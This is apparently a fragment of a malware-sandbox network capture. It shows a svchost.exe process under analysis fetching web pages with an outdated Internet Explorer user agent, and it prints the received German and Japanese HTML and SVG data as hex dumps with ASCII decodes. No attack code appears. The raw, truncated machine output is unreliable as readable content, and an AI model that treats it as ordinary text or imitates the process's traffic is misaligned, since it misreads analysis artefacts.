                                                                                                                                                                              2023-09-15 05:28:18 UTC5617INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                              2023-09-15 05:28:18 UTC5634INData Raw: 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 33 39 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 30 30 70 78 29 22 0a 20 20 20 20
                                                                                                                                                                              Data Ascii: min/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 1399px) and (min-width:992px)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(min-width: 1400px)"
                                                                                                                                                                              2023-09-15 05:28:18 UTC5650INData Raw: 39 39 32 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 30 30 70 78 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 65 6d 62 65 64 2d 69 74 65 6d 20 20 69 6d 67 20 69 6d 67 2d 66 6c 75 69 64 22 20
                                                                                                                                                                              Data Ascii: 992px)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(min-width: 1400px)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><img class="image-embed-item img img-fluid"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              27192.168.2.34439449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:28:18 UTC5600OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: nts-web.net
                                                                                                                                                                              2023-09-15 05:28:18 UTC5653INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:28:18 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 2599149
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                              ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2023-09-15 05:28:18 UTC5653INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                              2023-09-15 05:28:18 UTC5669INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                              Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                              2023-09-15 05:28:19 UTC5688INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                              Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                              2023-09-15 05:28:19 UTC5704INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                              Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                              2023-09-15 05:28:19 UTC5720INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                              Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                              2023-09-15 05:28:19 UTC5720INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                              Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                              2023-09-15 05:28:19 UTC5743INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                              Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                              2023-09-15 05:28:19 UTC5759INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                              Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                              2023-09-15 05:28:19 UTC5775INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                              Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                              2023-09-15 05:28:19 UTC5791INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                              Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                              2023-09-15 05:28:19 UTC5807INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                              Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                              2023-09-15 05:28:19 UTC5824INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                              Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                              2023-09-15 05:28:19 UTC5840INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                              Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                              2023-09-15 05:28:19 UTC5856INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                              Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                              2023-09-15 05:28:19 UTC5872INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                              Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
